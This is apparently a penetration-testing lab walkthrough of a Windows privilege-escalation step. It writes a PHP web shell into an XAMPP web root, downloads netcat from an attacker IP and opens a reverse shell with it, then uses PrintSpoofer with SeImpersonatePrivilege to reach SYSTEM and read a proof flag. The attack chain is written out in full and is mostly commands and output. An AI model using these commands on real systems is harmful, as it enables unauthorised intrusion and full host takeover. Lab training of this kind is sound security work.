LinkedIn

Priv Esc

PS C:\xampp\htdocs> echo meow > catz.txt
echo meow > catz.txt
PS C:\xampp\htdocs> dir
dir


    Directory: C:\xampp\htdocs


Mode                LastWriteTime         Length Name                                              
----                -------------         ------ ----                                              
d-----        7/13/2021   3:18 AM                assets                                            
d-----        7/13/2021   3:18 AM                css                                               
d-----        7/13/2021   3:18 AM                js                                                
d-----        9/21/2024   5:20 AM                uploads                                           
-a----        9/21/2024   5:45 AM             14 catz.txt                                          
-a----         7/7/2021  10:53 AM           9635 index.php                                         
-a----         7/7/2021   9:56 AM            835 upload.php

Write permission to C:\xampp\htdocs

$ echo "<?php echo shell_exec(\$_GET['cmd']); ?>" > cmd.php
$ python -m http.server 80
PS C:\xampp\htdocs> powershell iwr http://192.168.45.239/cmd.php -o C:\xampp\htdocs\cmd.php
PS C:\xampp\htdocs> powershell iwr http://192.168.45.239/nc.exe -o C:\xampp\htdocs\nc.exe
$ curl 'http://192.168.219.169/cmd.php?cmd=nc.exe+192.168.45.239+1337+-e+powershell.exe'
PS C:\xampp\htdocs> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeTcbPrivilege                Act as part of the operating system       Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

PS C:\programdata> curl 192.168.45.239/PrintSpoofer64.exe -o PrintSpoofer64.exe
PS C:\programdata> curl 192.168.45.239/PrintSpoofer64.exe -o PrintSpoofer64.exe
curl 192.168.45.239/PrintSpoofer64.exe -o PrintSpoofer64.exe
PS C:\programdata> .\PrintSpoofer64.exe -i -c cmd
.\PrintSpoofer64.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.17763.2029]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>type C:\Users\Administrator\Desktop\proof.txt
type C:\Users\Administrator\Desktop\proof.txt
04b7788851f994eb3bc90d64addd838c

C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::3c74:df45:acab:f118%5
   IPv4 Address. . . . . . . . . . . : 192.168.219.169
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.219.254
PreviousEnumerationNextCredentials / Notes / LL

Last updated